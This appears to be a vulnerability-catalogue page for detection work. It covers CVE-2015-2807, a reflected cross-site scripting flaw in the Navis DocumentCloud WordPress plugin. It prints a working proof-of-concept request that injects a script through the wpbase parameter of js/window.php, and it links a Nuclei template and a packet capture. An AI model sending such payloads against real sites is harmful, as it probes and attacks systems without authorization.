🔙 목록으로 돌아가기

CVE-2015-2807: Navis DocumentCloud <0.1.1 - Cross-Site Scripting

TitleNavis DocumentCloud <0.1.1 - Cross-Site Scripting
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
RemediationUpgrade to a version higher than 0.1.1 that includes proper input sanitization to mitigate the XSS vulnerability.
CVSS Score4.3
EPSS Score0.0689
CVE IDCVE-2015-2807
CWE IDCWE-79
Tags cve2015 cve wordpress wp-plugin xss documentcloud vuln

🔍 Vulnerability Description

Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.

🌐 HTTP Request

GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; ja-jp) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2
Connection: close
Accept-Encoding: gzip
GET /wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-2807.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-2807.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A